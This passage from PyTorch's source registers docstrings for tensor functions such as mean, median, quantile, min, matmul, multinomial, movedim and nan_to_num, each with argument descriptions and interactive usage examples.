element in :attr:`input`. The result is sorted lexicographically, with
the last index changing the fastest (C-style).
If :attr:`input` has :math:`n` dimensions, then the resulting indices tensor
:attr:`out` is of size :math:`(z \times n)`, where :math:`z` is the total number of
non-zero elements in the :attr:`input` tensor.
.. note::
This function is similar to NumPy's `argwhere`.
When :attr:`input` is on CUDA, this function causes host-device synchronization.
Args:
{input}
Example::
>>> t = torch.tensor([1, 0, 1])
>>> torch.argwhere(t)
tensor([[0],
[2]])
>>> t = torch.tensor([[1, 0, 1], [0, 1, 1]])
>>> torch.argwhere(t)
tensor([[0, 0],
[0, 2],
[1, 1],
[1, 2]])
""")
add_docstr(torch.mean, r"""
mean(input, *, dtype=None) -> Tensor
Returns the mean value of all elements in the :attr:`input` tensor.
Args:
{input}
Keyword args:
{dtype}
Example::
>>> a = torch.randn(1, 3)
>>> a
tensor([[ 0.2294, -0.5481, 1.3288]])
>>> torch.mean(a)
tensor(0.3367)
.. function:: mean(input, dim, keepdim=False, *, dtype=None, out=None) -> Tensor
:noindex:
Returns the mean value of each row of the :attr:`input` tensor in the given
dimension :attr:`dim`. If :attr:`dim` is a list of dimensions,
reduce over all of them.
{keepdim_details}
Args:
{input}
{dim}
{keepdim}
Keyword args:
{dtype}
{out}
.. seealso::
:func:`torch.nanmean` computes the mean value of `non-NaN` elements.
Example::
>>> a = torch.randn(4, 4)
>>> a
tensor([[-0.3841, 0.6320, 0.4254, -0.7384],
[-0.9644, 1.0131, -0.6549, -1.4279],
[-0.2951, -1.3350, -0.7694, 0.5600],
[ 1.0842, -0.9580, 0.3623, 0.2343]])
>>> torch.mean(a, 1)
tensor([-0.0163, -0.5085, -0.4599, 0.1807])
>>> torch.mean(a, 1, True)
tensor([[-0.0163],
[-0.5085],
[-0.4599],
[ 0.1807]])
""".format(**multi_dim_common))
add_docstr(torch.nanmean, r"""
nanmean(input, dim=None, keepdim=False, *, dtype=None, out=None) -> Tensor
Computes the mean of all `non-NaN` elements along the specified dimensions.
This function is identical to :func:`torch.mean` when there are no `NaN` values
in the :attr:`input` tensor. In the presence of `NaN`, :func:`torch.mean` will
propagate the `NaN` to the output whereas :func:`torch.nanmean` will ignore the
`NaN` values (`torch.nanmean(a)` is equivalent to `torch.mean(a[~a.isnan()])`).
{keepdim_details}
Args:
{input}
{dim} If `None`, reduces all dimensions. Default is `None`.
{keepdim}
Keyword args:
{dtype}
{out}
.. seealso::
:func:`torch.mean` computes the mean value, propagating `NaN`.
Example::
>>> x = torch.tensor([[torch.nan, 1, 2], [1, 2, 3]])
>>> x.mean()
tensor(nan)
>>> x.nanmean()
tensor(1.8000)
>>> x.mean(dim=0)
tensor([ nan, 1.5000, 2.5000])
>>> x.nanmean(dim=0)
tensor([1.0000, 1.5000, 2.5000])
# If all elements in the reduced dimensions are NaN then the result is NaN
>>> torch.tensor([torch.nan]).nanmean()
tensor(nan)
""".format(**multi_dim_common))
add_docstr(torch.median,
r"""
median(input) -> Tensor
Returns the median of the values in :attr:`input`.
.. note::
The median is not unique for :attr:`input` tensors with an even number
of elements. In this case the lower of the two medians is returned. To
compute the mean of both medians, use :func:`torch.quantile` with ``q=0.5`` instead.
.. warning::
This function produces deterministic (sub)gradients unlike ``median(dim=0)``
Args:
{input}
Example::
>>> a = torch.randn(1, 3)
>>> a
tensor([[ 1.5219, -1.5212, 0.2202]])
>>> torch.median(a)
tensor(0.2202)
.. function:: median(input, dim=-1, keepdim=False, *, out=None) -> (Tensor, LongTensor)
:noindex:
Returns a namedtuple ``(values, indices)`` where ``values`` contains the median of each row of :attr:`input`
in the dimension :attr:`dim`, and ``indices`` contains the index of the median values found in the dimension :attr:`dim`.
By default, :attr:`dim` is the last dimension of the :attr:`input` tensor.
If :attr:`keepdim` is ``True``, the output tensors are of the same size
as :attr:`input` except in the dimension :attr:`dim` where they are of size 1.
Otherwise, :attr:`dim` is squeezed (see :func:`torch.squeeze`), resulting in
the outputs tensor having 1 fewer dimension than :attr:`input`.
.. note::
The median is not unique for :attr:`input` tensors with an even number
of elements in the dimension :attr:`dim`. In this case the lower of the
two medians is returned. To compute the mean of both medians in
:attr:`input`, use :func:`torch.quantile` with ``q=0.5`` instead.
.. warning::
``indices`` does not necessarily contain the first occurrence of each
median value found, unless it is unique.
The exact implementation details are device-specific.
Do not expect the same result when run on CPU and GPU in general.
For the same reason do not expect the gradients to be deterministic.
Args:
{input}
{dim}
{keepdim}
Keyword args:
out ((Tensor, Tensor), optional): The first tensor will be populated with the median values and the second
tensor, which must have dtype long, with their indices in the dimension
:attr:`dim` of :attr:`input`.
Example::
>>> a = torch.randn(4, 5)
>>> a
tensor([[ 0.2505, -0.3982, -0.9948, 0.3518, -1.3131],
[ 0.3180, -0.6993, 1.0436, 0.0438, 0.2270],
[-0.2751, 0.7303, 0.2192, 0.3321, 0.2488],
[ 1.0778, -1.9510, 0.7048, 0.4742, -0.7125]])
>>> torch.median(a, 1)
torch.return_types.median(values=tensor([-0.3982, 0.2270, 0.2488, 0.4742]), indices=tensor([1, 4, 4, 3]))
""".format(**single_dim_common))
add_docstr(torch.nanmedian,
r"""
nanmedian(input) -> Tensor
Returns the median of the values in :attr:`input`, ignoring ``NaN`` values.
This function is identical to :func:`torch.median` when there are no ``NaN`` values in :attr:`input`.
When :attr:`input` has one or more ``NaN`` values, :func:`torch.median` will always return ``NaN``,
while this function will return the median of the non-``NaN`` elements in :attr:`input`.
If all the elements in :attr:`input` are ``NaN`` it will also return ``NaN``.
Args:
{input}
Example::
>>> a = torch.tensor([1, float('nan'), 3, 2])
>>> a.median()
tensor(nan)
>>> a.nanmedian()
tensor(2.)
.. function:: nanmedian(input, dim=-1, keepdim=False, *, out=None) -> (Tensor, LongTensor)
:noindex:
Returns a namedtuple ``(values, indices)`` where ``values`` contains the median of each row of :attr:`input`
in the dimension :attr:`dim`, ignoring ``NaN`` values, and ``indices`` contains the index of the median values
found in the dimension :attr:`dim`.
This function is identical to :func:`torch.median` when there are no ``NaN`` values in a reduced row. When a reduced row has
one or more ``NaN`` values, :func:`torch.median` will always reduce it to ``NaN``, while this function will reduce it to the
median of the non-``NaN`` elements. If all the elements in a reduced row are ``NaN`` then it will be reduced to ``NaN``, too.
Args:
{input}
{dim}
{keepdim}
Keyword args:
out ((Tensor, Tensor), optional): The first tensor will be populated with the median values and the second
tensor, which must have dtype long, with their indices in the dimension
:attr:`dim` of :attr:`input`.
Example::
>>> a = torch.tensor([[2, 3, 1], [float('nan'), 1, float('nan')]])
>>> a
tensor([[2., 3., 1.],
[nan, 1., nan]])
>>> a.median(0)
torch.return_types.median(values=tensor([nan, 1., nan]), indices=tensor([1, 1, 1]))
>>> a.nanmedian(0)
torch.return_types.nanmedian(values=tensor([2., 1., 1.]), indices=tensor([0, 1, 0]))
""".format(**single_dim_common))
add_docstr(torch.quantile, r"""
quantile(input, q, dim=None, keepdim=False, *, interpolation='linear', out=None) -> Tensor
Computes the q-th quantiles of each row of the :attr:`input` tensor along the dimension :attr:`dim`.
To compute the quantile, we map q in [0, 1] to the range of indices [0, n] to find the location
of the quantile in the sorted input. If the quantile lies between two data points ``a < b`` with
indices ``i`` and ``j`` in the sorted order, result is computed according to the given
:attr:`interpolation` method as follows:
- ``linear``: ``a + (b - a) * fraction``, where ``fraction`` is the fractional part of the computed quantile index.
- ``lower``: ``a``.
- ``higher``: ``b``.
- ``nearest``: ``a`` or ``b``, whichever's index is closer to the computed quantile index (rounding down for .5 fractions).
- ``midpoint``: ``(a + b) / 2``.
If :attr:`q` is a 1D tensor, the first dimension of the output represents the quantiles and has size
equal to the size of :attr:`q`, the remaining dimensions are what remains from the reduction.
.. note::
By default :attr:`dim` is ``None`` resulting in the :attr:`input` tensor being flattened before computation.
Args:
{input}
q (float or Tensor): a scalar or 1D tensor of values in the range [0, 1].
{dim}
{keepdim}
Keyword arguments:
interpolation (string): interpolation method to use when the desired quantile lies between two data points.
Can be ``linear``, ``lower``, ``higher``, ``midpoint`` and ``nearest``.
Default is ``linear``.
{out}
Example::
>>> a = torch.randn(2, 3)
>>> a
tensor([[ 0.0795, -1.2117, 0.9765],
[ 1.1707, 0.6706, 0.4884]])
>>> q = torch.tensor([0.25, 0.5, 0.75])
>>> torch.quantile(a, q, dim=1, keepdim=True)
tensor([[[-0.5661],
[ 0.5795]],
[[ 0.0795],
[ 0.6706]],
[[ 0.5280],
[ 0.9206]]])
>>> torch.quantile(a, q, dim=1, keepdim=True).shape
torch.Size([3, 2, 1])
>>> a = torch.arange(4.)
>>> a
tensor([0., 1., 2., 3.])
>>> torch.quantile(a, 0.6, interpolation='linear')
tensor(1.8000)
>>> torch.quantile(a, 0.6, interpolation='lower')
tensor(1.)
>>> torch.quantile(a, 0.6, interpolation='higher')
tensor(2.)
>>> torch.quantile(a, 0.6, interpolation='midpoint')
tensor(1.5000)
>>> torch.quantile(a, 0.6, interpolation='nearest')
tensor(2.)
>>> torch.quantile(a, 0.4, interpolation='nearest')
tensor(1.)
""".format(**single_dim_common))
add_docstr(torch.nanquantile, r"""
nanquantile(input, q, dim=None, keepdim=False, *, interpolation='linear', out=None) -> Tensor
This is a variant of :func:`torch.quantile` that "ignores" ``NaN`` values,
computing the quantiles :attr:`q` as if ``NaN`` values in :attr:`input` did
not exist. If all values in a reduced row are ``NaN`` then the quantiles for
that reduction will be ``NaN``. See the documentation for :func:`torch.quantile`.
Args:
{input}
q (float or Tensor): a scalar or 1D tensor of quantile values in the range [0, 1]
{dim}
{keepdim}
Keyword arguments:
interpolation (string): interpolation method to use when the desired quantile lies between two data points.
Can be ``linear``, ``lower``, ``higher``, ``midpoint`` and ``nearest``.
Default is ``linear``.
{out}
Example::
>>> t = torch.tensor([float('nan'), 1, 2])
>>> t.quantile(0.5)
tensor(nan)
>>> t.nanquantile(0.5)
tensor(1.5000)
>>> t = torch.tensor([[float('nan'), float('nan')], [1, 2]])
>>> t
tensor([[nan, nan],
[1., 2.]])
>>> t.nanquantile(0.5, dim=0)
tensor([1., 2.])
>>> t.nanquantile(0.5, dim=1)
tensor([ nan, 1.5000])
""".format(**single_dim_common))
add_docstr(torch.min,
r"""
min(input) -> Tensor
Returns the minimum value of all elements in the :attr:`input` tensor.
.. warning::
This function produces deterministic (sub)gradients unlike ``min(dim=0)``
Args:
{input}
Example::
>>> a = torch.randn(1, 3)
>>> a
tensor([[ 0.6750, 1.0857, 1.7197]])
>>> torch.min(a)
tensor(0.6750)
.. function:: min(input, dim, keepdim=False, *, out=None) -> (Tensor, LongTensor)
:noindex:
Returns a namedtuple ``(values, indices)`` where ``values`` is the minimum
value of each row of the :attr:`input` tensor in the given dimension
:attr:`dim`. And ``indices`` is the index location of each minimum value found
(argmin).
If :attr:`keepdim` is ``True``, the output tensors are of the same size as
:attr:`input` except in the dimension :attr:`dim` where they are of size 1.
Otherwise, :attr:`dim` is squeezed (see :func:`torch.squeeze`), resulting in
the output tensors having 1 fewer dimension than :attr:`input`.
.. note:: If there are multiple minimal values in a reduced row then
the indices of the first minimal value are returned.
Args:
{input}
{dim}
{keepdim}
Keyword args:
out (tuple, optional): the tuple of two output tensors (min, min_indices)
Example::
>>> a = torch.randn(4, 4)
>>> a
tensor([[-0.6248, 1.1334, -1.1899, -0.2803],
[-1.4644, -0.2635, -0.3651, 0.6134],
[ 0.2457, 0.0384, 1.0128, 0.7015],
[-0.1153, 2.9849, 2.1458, 0.5788]])
>>> torch.min(a, 1)
torch.return_types.min(values=tensor([-1.1899, -1.4644, 0.0384, -0.1153]), indices=tensor([2, 0, 1, 0]))
.. function:: min(input, other, *, out=None) -> Tensor
:noindex:
See :func:`torch.minimum`.
""".format(**single_dim_common))
add_docstr(torch.minimum, r"""
minimum(input, other, *, out=None) -> Tensor
Computes the element-wise minimum of :attr:`input` and :attr:`other`.
.. note::
If one of the elements being compared is a NaN, then that element is returned.
:func:`minimum` is not supported for tensors with complex dtypes.
Args:
{input}
other (Tensor): the second input tensor
Keyword args:
{out}
Example::
>>> a = torch.tensor((1, 2, -1))
>>> b = torch.tensor((3, 0, 4))
>>> torch.minimum(a, b)
tensor([1, 0, -1])
""".format(**common_args))
add_docstr(torch.fmin, r"""
fmin(input, other, *, out=None) -> Tensor
Computes the element-wise minimum of :attr:`input` and :attr:`other`.
This is like :func:`torch.minimum` except it handles NaNs differently:
if exactly one of the two elements being compared is a NaN then the non-NaN element is taken as the minimum.
Only if both elements are NaN is NaN propagated.
This function is a wrapper around C++'s ``std::fmin`` and is similar to NumPy's ``fmin`` function.
Supports :ref:`broadcasting to a common shape <broadcasting-semantics>`,
:ref:`type promotion <type-promotion-doc>`, and integer and floating-point inputs.
Args:
{input}
other (Tensor): the second input tensor
Keyword args:
{out}
Example::
>>> a = torch.tensor([2.2, float('nan'), 2.1, float('nan')])
>>> b = torch.tensor([-9.3, 0.1, float('nan'), float('nan')])
>>> torch.fmin(a, b)
tensor([-9.3000, 0.1000, 2.1000, nan])
""".format(**common_args))
add_docstr(torch.amin,
r"""
amin(input, dim, keepdim=False, *, out=None) -> Tensor
Returns the minimum value of each slice of the :attr:`input` tensor in the given
dimension(s) :attr:`dim`.
.. note::
The difference between ``max``/``min`` and ``amax``/``amin`` is:
- ``amax``/``amin`` supports reducing on multiple dimensions,
- ``amax``/``amin`` does not return indices,
- ``amax``/``amin`` evenly distributes gradient between equal values,
while ``max(dim)``/``min(dim)`` propagates gradient only to a single
index in the source tensor.
{keepdim_details}
Args:
{input}
{dim}
{keepdim}
Keyword args:
{out}
Example::
>>> a = torch.randn(4, 4)
>>> a
tensor([[ 0.6451, -0.4866, 0.2987, -1.3312],
[-0.5744, 1.2980, 1.8397, -0.2713],
[ 0.9128, 0.9214, -1.7268, -0.2995],
[ 0.9023, 0.4853, 0.9075, -1.6165]])
>>> torch.amin(a, 1)
tensor([-1.3312, -0.5744, -1.7268, -1.6165])
""".format(**multi_dim_common))
add_docstr(torch.aminmax, r"""
aminmax(input, *, dim=None, keepdim=False, out=None) -> (Tensor min, Tensor max)
Computes the minimum and maximum values of the :attr:`input` tensor.
Args:
input (Tensor):
The input tensor
Keyword Args:
dim (Optional[int]):
The dimension along which to compute the values. If `None`,
computes the values over the entire :attr:`input` tensor.
Default is `None`.
keepdim (bool):
If `True`, the reduced dimensions will be kept in the output
tensor as dimensions with size 1 for broadcasting, otherwise
they will be removed, as if calling (:func:`torch.squeeze`).
Default is `False`.
out (Optional[Tuple[Tensor, Tensor]]):
Optional tensors on which to write the result. Must have the same
shape and dtype as the expected output.
Default is `None`.
Returns:
A named tuple `(min, max)` containing the minimum and maximum values.
Raises:
RuntimeError
If any of the dimensions to compute the values over has size 0.
.. note::
NaN values are propagated to the output if at least one value is NaN.
.. seealso::
:func:`torch.amin` computes just the minimum value
:func:`torch.amax` computes just the maximum value
Example::
>>> torch.aminmax(torch.tensor([1, -3, 5]))
torch.return_types.aminmax(
min=tensor(-3),
max=tensor(5))
>>> # aminmax propagates NaNs
>>> torch.aminmax(torch.tensor([1, -3, 5, torch.nan]))
torch.return_types.aminmax(
min=tensor(nan),
max=tensor(nan))
>>> t = torch.arange(10).view(2, 5)
>>> t
tensor([[0, 1, 2, 3, 4],
[5, 6, 7, 8, 9]])
>>> t.aminmax(dim=0, keepdim=True)
torch.return_types.aminmax(
min=tensor([[0, 1, 2, 3, 4]]),
max=tensor([[5, 6, 7, 8, 9]]))
""")
add_docstr(torch.argmin,
r"""
argmin(input, dim=None, keepdim=False) -> LongTensor
Returns the indices of the minimum value(s) of the flattened tensor or along a dimension
This is the second value returned by :meth:`torch.min`. See its
documentation for the exact semantics of this method.
.. note:: If there are multiple minimal values then the indices of the first minimal value are returned.
Args:
{input}
{dim} If ``None``, the argmin of the flattened input is returned.
{keepdim} Ignored if ``dim=None``.
Example::
>>> a = torch.randn(4, 4)
>>> a
tensor([[ 0.1139, 0.2254, -0.1381, 0.3687],
[ 1.0100, -1.1975, -0.0102, -0.4732],
[-0.9240, 0.1207, -0.7506, -1.0213],
[ 1.7809, -1.2960, 0.9384, 0.1438]])
>>> torch.argmin(a)
tensor(13)
>>> torch.argmin(a, dim=1)
tensor([ 2, 1, 3, 1])
>>> torch.argmin(a, dim=1, keepdim=True)
tensor([[2],
[1],
[3],
[1]])
""".format(**single_dim_common))
add_docstr(torch.mm,
r"""
mm(input, mat2, *, out=None) -> Tensor
Performs a matrix multiplication of the matrices :attr:`input` and :attr:`mat2`.
If :attr:`input` is a :math:`(n \times m)` tensor, :attr:`mat2` is a
:math:`(m \times p)` tensor, :attr:`out` will be a :math:`(n \times p)` tensor.
.. note:: This function does not :ref:`broadcast <broadcasting-semantics>`.
For broadcasting matrix products, see :func:`torch.matmul`.
Supports strided and sparse 2-D tensors as inputs, autograd with
respect to strided inputs.
{tf32_note}
Args:
input (Tensor): the first matrix to be matrix multiplied
mat2 (Tensor): the second matrix to be matrix multiplied
Keyword args:
{out}
Example::
>>> mat1 = torch.randn(2, 3)
>>> mat2 = torch.randn(3, 3)
>>> torch.mm(mat1, mat2)
tensor([[ 0.4851, 0.5037, -0.3633],
[-0.0760, -3.6705, 2.4784]])
""".format(**common_args, **tf32_notes))
add_docstr(torch.hspmm,
r"""
hspmm(mat1, mat2, *, out=None) -> Tensor
Performs a matrix multiplication of a :ref:`sparse COO matrix
<sparse-coo-docs>` :attr:`mat1` and a strided matrix :attr:`mat2`. The
result is a (1 + 1)-dimensional :ref:`hybrid COO matrix
<sparse-hybrid-coo-docs>`.
Args:
mat1 (Tensor): the first sparse matrix to be matrix multiplied
mat2 (Tensor): the second strided matrix to be matrix multiplied
Keyword args:
{out}
""".format(**common_args))
add_docstr(torch.matmul,
r"""
matmul(input, other, *, out=None) -> Tensor
Matrix product of two tensors.
The behavior depends on the dimensionality of the tensors as follows:
- If both tensors are 1-dimensional, the dot product (scalar) is returned.
- If both arguments are 2-dimensional, the matrix-matrix product is returned.
- If the first argument is 1-dimensional and the second argument is 2-dimensional,
a 1 is prepended to its dimension for the purpose of the matrix multiply.
After the matrix multiply, the prepended dimension is removed.
- If the first argument is 2-dimensional and the second argument is 1-dimensional,
the matrix-vector product is returned.
- If both arguments are at least 1-dimensional and at least one argument is
N-dimensional (where N > 2), then a batched matrix multiply is returned. If the first
argument is 1-dimensional, a 1 is prepended to its dimension for the purpose of the
batched matrix multiply and removed after. If the second argument is 1-dimensional, a
1 is appended to its dimension for the purpose of the batched matrix multiple and removed after.
The non-matrix (i.e. batch) dimensions are :ref:`broadcasted <broadcasting-semantics>` (and thus
must be broadcastable). For example, if :attr:`input` is a
:math:`(j \times 1 \times n \times n)` tensor and :attr:`other` is a :math:`(k \times n \times n)`
tensor, :attr:`out` will be a :math:`(j \times k \times n \times n)` tensor.
Note that the broadcasting logic only looks at the batch dimensions when determining if the inputs
are broadcastable, and not the matrix dimensions. For example, if :attr:`input` is a
:math:`(j \times 1 \times n \times m)` tensor and :attr:`other` is a :math:`(k \times m \times p)`
tensor, these inputs are valid for broadcasting even though the final two dimensions (i.e. the
matrix dimensions) are different. :attr:`out` will be a :math:`(j \times k \times n \times p)` tensor.
{tf32_note}
.. note::
The 1-dimensional dot product version of this function does not support an :attr:`out` parameter.
Arguments:
input (Tensor): the first tensor to be multiplied
other (Tensor): the second tensor to be multiplied
Keyword args:
{out}
Example::
>>> # vector x vector
>>> tensor1 = torch.randn(3)
>>> tensor2 = torch.randn(3)
>>> torch.matmul(tensor1, tensor2).size()
torch.Size([])
>>> # matrix x vector
>>> tensor1 = torch.randn(3, 4)
>>> tensor2 = torch.randn(4)
>>> torch.matmul(tensor1, tensor2).size()
torch.Size([3])
>>> # batched matrix x broadcasted vector
>>> tensor1 = torch.randn(10, 3, 4)
>>> tensor2 = torch.randn(4)
>>> torch.matmul(tensor1, tensor2).size()
torch.Size([10, 3])
>>> # batched matrix x batched matrix
>>> tensor1 = torch.randn(10, 3, 4)
>>> tensor2 = torch.randn(10, 4, 5)
>>> torch.matmul(tensor1, tensor2).size()
torch.Size([10, 3, 5])
>>> # batched matrix x broadcasted matrix
>>> tensor1 = torch.randn(10, 3, 4)
>>> tensor2 = torch.randn(4, 5)
>>> torch.matmul(tensor1, tensor2).size()
torch.Size([10, 3, 5])
""".format(**common_args, **tf32_notes))
add_docstr(torch.mode,
r"""
mode(input, dim=-1, keepdim=False, *, out=None) -> (Tensor, LongTensor)
Returns a namedtuple ``(values, indices)`` where ``values`` is the mode
value of each row of the :attr:`input` tensor in the given dimension
:attr:`dim`, i.e. a value which appears most often
in that row, and ``indices`` is the index location of each mode value found.
By default, :attr:`dim` is the last dimension of the :attr:`input` tensor.
If :attr:`keepdim` is ``True``, the output tensors are of the same size as
:attr:`input` except in the dimension :attr:`dim` where they are of size 1.
Otherwise, :attr:`dim` is squeezed (see :func:`torch.squeeze`), resulting
in the output tensors having 1 fewer dimension than :attr:`input`.
.. note:: This function is not defined for ``torch.cuda.Tensor`` yet.
Args:
{input}
{dim}
{keepdim}
Keyword args:
out (tuple, optional): the result tuple of two output tensors (values, indices)
Example::
>>> a = torch.randint(10, (5,))
>>> a
tensor([6, 5, 1, 0, 2])
>>> b = a + (torch.randn(50, 1) * 5).long()
>>> torch.mode(b, 0)
torch.return_types.mode(values=tensor([6, 5, 1, 0, 2]), indices=tensor([2, 2, 2, 2, 2]))
""".format(**single_dim_common))
add_docstr(torch.mul, r"""
mul(input, other, *, out=None) -> Tensor
Multiplies :attr:`input` by :attr:`other`.
.. math::
\text{out}_i = \text{input}_i \times \text{other}_i
""" + r"""
Supports :ref:`broadcasting to a common shape <broadcasting-semantics>`,
:ref:`type promotion <type-promotion-doc>`, and integer, float, and complex inputs.
Args:
{input}
other (Tensor or Number) - the tensor or number to multiply input by.
Keyword args:
{out}
Examples::
>>> a = torch.randn(3)
>>> a
tensor([ 0.2015, -0.4255, 2.6087])
>>> torch.mul(a, 100)
tensor([ 20.1494, -42.5491, 260.8663])
>>> b = torch.randn(4, 1)
>>> b
tensor([[ 1.1207],
[-0.3137],
[ 0.0700],
[ 0.8378]])
>>> c = torch.randn(1, 4)
>>> c
tensor([[ 0.5146, 0.1216, -0.5244, 2.2382]])
>>> torch.mul(b, c)
tensor([[ 0.5767, 0.1363, -0.5877, 2.5083],
[-0.1614, -0.0382, 0.1645, -0.7021],
[ 0.0360, 0.0085, -0.0367, 0.1567],
[ 0.4312, 0.1019, -0.4394, 1.8753]])
""".format(**common_args))
add_docstr(torch.multiply, r"""
multiply(input, other, *, out=None)
Alias for :func:`torch.mul`.
""")
add_docstr(torch.multinomial,
r"""
multinomial(input, num_samples, replacement=False, *, generator=None, out=None) -> LongTensor
Returns a tensor where each row contains :attr:`num_samples` indices sampled
from the multinomial probability distribution located in the corresponding row
of tensor :attr:`input`.
.. note::
The rows of :attr:`input` do not need to sum to one (in which case we use
the values as weights), but must be non-negative, finite and have
a non-zero sum.
Indices are ordered from left to right according to when each was sampled
(first samples are placed in first column).
If :attr:`input` is a vector, :attr:`out` is a vector of size :attr:`num_samples`.
If :attr:`input` is a matrix with `m` rows, :attr:`out` is an matrix of shape
:math:`(m \times \text{{num\_samples}})`.
If replacement is ``True``, samples are drawn with replacement.
If not, they are drawn without replacement, which means that when a
sample index is drawn for a row, it cannot be drawn again for that row.
.. note::
When drawn without replacement, :attr:`num_samples` must be lower than
number of non-zero elements in :attr:`input` (or the min number of non-zero
elements in each row of :attr:`input` if it is a matrix).
Args:
input (Tensor): the input tensor containing probabilities
num_samples (int): number of samples to draw
replacement (bool, optional): whether to draw with replacement or not
Keyword args:
{generator}
{out}
Example::
>>> weights = torch.tensor([0, 10, 3, 0], dtype=torch.float) # create a tensor of weights
>>> torch.multinomial(weights, 2)
tensor([1, 2])
>>> torch.multinomial(weights, 4) # ERROR!
RuntimeError: invalid argument 2: invalid multinomial distribution (with replacement=False,
not enough non-negative category to sample) at ../aten/src/TH/generic/THTensorRandom.cpp:320
>>> torch.multinomial(weights, 4, replacement=True)
tensor([ 2, 1, 1, 1])
""".format(**common_args))
add_docstr(torch.mv,
r"""
mv(input, vec, *, out=None) -> Tensor
Performs a matrix-vector product of the matrix :attr:`input` and the vector
:attr:`vec`.
If :attr:`input` is a :math:`(n \times m)` tensor, :attr:`vec` is a 1-D tensor of
size :math:`m`, :attr:`out` will be 1-D of size :math:`n`.
.. note:: This function does not :ref:`broadcast <broadcasting-semantics>`.
Args:
input (Tensor): matrix to be multiplied
vec (Tensor): vector to be multiplied
Keyword args:
{out}
Example::
>>> mat = torch.randn(2, 3)
>>> vec = torch.randn(3)
>>> torch.mv(mat, vec)
tensor([ 1.0404, -0.6361])
""".format(**common_args))
add_docstr(torch.mvlgamma,
r"""
mvlgamma(input, p, *, out=None) -> Tensor
Alias for :func:`torch.special.multigammaln`.
""")
add_docstr(torch.movedim, r"""
movedim(input, source, destination) -> Tensor
Moves the dimension(s) of :attr:`input` at the position(s) in :attr:`source`
to the position(s) in :attr:`destination`.
Other dimensions of :attr:`input` that are not explicitly moved remain in
their original order and appear at the positions not specified in :attr:`destination`.
Args:
{input}
source (int or tuple of ints): Original positions of the dims to move. These must be unique.
destination (int or tuple of ints): Destination positions for each of the original dims. These must also be unique.
Examples::
>>> t = torch.randn(3,2,1)
>>> t
tensor([[[-0.3362],
[-0.8437]],
[[-0.9627],
[ 0.1727]],
[[ 0.5173],
[-0.1398]]])
>>> torch.movedim(t, 1, 0).shape
torch.Size([2, 3, 1])
>>> torch.movedim(t, 1, 0)
tensor([[[-0.3362],
[-0.9627],
[ 0.5173]],
[[-0.8437],
[ 0.1727],
[-0.1398]]])
>>> torch.movedim(t, (1, 2), (0, 1)).shape
torch.Size([2, 1, 3])
>>> torch.movedim(t, (1, 2), (0, 1))
tensor([[[-0.3362, -0.9627, 0.5173]],
[[-0.8437, 0.1727, -0.1398]]])
""".format(**common_args))
add_docstr(torch.moveaxis, r"""
moveaxis(input, source, destination) -> Tensor
Alias for :func:`torch.movedim`.
This function is equivalent to NumPy's moveaxis function.
Examples::
>>> t = torch.randn(3,2,1)
>>> t
tensor([[[-0.3362],
[-0.8437]],
[[-0.9627],
[ 0.1727]],
[[ 0.5173],
[-0.1398]]])
>>> torch.moveaxis(t, 1, 0).shape
torch.Size([2, 3, 1])
>>> torch.moveaxis(t, 1, 0)
tensor([[[-0.3362],
[-0.9627],
[ 0.5173]],
[[-0.8437],
[ 0.1727],
[-0.1398]]])
>>> torch.moveaxis(t, (1, 2), (0, 1)).shape
torch.Size([2, 1, 3])
>>> torch.moveaxis(t, (1, 2), (0, 1))
tensor([[[-0.3362, -0.9627, 0.5173]],
[[-0.8437, 0.1727, -0.1398]]])
""".format(**common_args))
add_docstr(torch.swapdims, r"""
swapdims(input, dim0, dim1) -> Tensor
Alias for :func:`torch.transpose`.
This function is equivalent to NumPy's swapaxes function.
Examples::
>>> x = torch.tensor([[[0,1],[2,3]],[[4,5],[6,7]]])
>>> x
tensor([[[0, 1],
[2, 3]],
[[4, 5],
[6, 7]]])
>>> torch.swapdims(x, 0, 1)
tensor([[[0, 1],
[4, 5]],
[[2, 3],
[6, 7]]])
>>> torch.swapdims(x, 0, 2)
tensor([[[0, 4],
[2, 6]],
[[1, 5],
[3, 7]]])
""".format(**common_args))
add_docstr(torch.swapaxes, r"""
swapaxes(input, axis0, axis1) -> Tensor
Alias for :func:`torch.transpose`.
This function is equivalent to NumPy's swapaxes function.
Examples::
>>> x = torch.tensor([[[0,1],[2,3]],[[4,5],[6,7]]])
>>> x
tensor([[[0, 1],
[2, 3]],
[[4, 5],
[6, 7]]])
>>> torch.swapaxes(x, 0, 1)
tensor([[[0, 1],
[4, 5]],
[[2, 3],
[6, 7]]])
>>> torch.swapaxes(x, 0, 2)
tensor([[[0, 4],
[2, 6]],
[[1, 5],
[3, 7]]])
""".format(**common_args))
add_docstr(torch.narrow,
r"""
narrow(input, dim, start, length) -> Tensor
Returns a new tensor that is a narrowed version of :attr:`input` tensor. The
dimension :attr:`dim` is input from :attr:`start` to ``start + length``. The
returned tensor and :attr:`input` tensor share the same underlying storage.
Args:
input (Tensor): the tensor to narrow
dim (int): the dimension along which to narrow
start (int): the starting dimension
length (int): the distance to the ending dimension
Example::
>>> x = torch.tensor([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
>>> torch.narrow(x, 0, 0, 2)
tensor([[ 1, 2, 3],
[ 4, 5, 6]])
>>> torch.narrow(x, 1, 1, 2)
tensor([[ 2, 3],
[ 5, 6],
[ 8, 9]])
""")
add_docstr(torch.nan_to_num,
r"""
nan_to_num(input, nan=0.0, posinf=None, neginf=None, *, out=None) -> Tensor
Replaces :literal:`NaN`, positive infinity, and negative infinity values in :attr:`input`
with the values specified by :attr:`nan`, :attr:`posinf`, and :attr:`neginf`, respectively.
By default, :literal:`NaN`\ s are replaced with zero, positive infinity is replaced with the
greatest finite value representable by :attr:`input`'s dtype, and negative infinity
is replaced with the least finite value representable by :attr:`input`'s dtype.
Args:
{input}
nan (Number, optional): the value to replace :literal:`NaN`\s with. Default is zero.
posinf (Number, optional): if a Number, the value to replace positive infinity values with.
If None, positive infinity values are replaced with the greatest finite value representable by :attr:`input`'s dtype.
Default is None.
neginf (Number, optional): if a Number, the value to replace negative infinity values with.
If None, negative infinity values are replaced with the lowest finite value representable by :attr:`input`'s dtype.
Default is None.
Keyword args:
{out}
Example::
>>> x = torch.tensor([float('nan'), float('inf'), -float('inf'), 3.14])
>>> torch.nan_to_num(x)
tensor([ 0.0000e+00, 3.4028e+38, -3.4028e+38, 3.1400e+00])
>>> torch.nan_to_num(x, nan=2.0)
tensor([ 2.0000e+00, 3.4028e+38, -3.4028e+38, 3.1400e+00])
>>> torch.nan_to_num(x, nan=2.0, posinf=1.0)
tensor([ 2.0000e+00, 1.0000e+00, -3.4028e+38, 3.1400e+00])
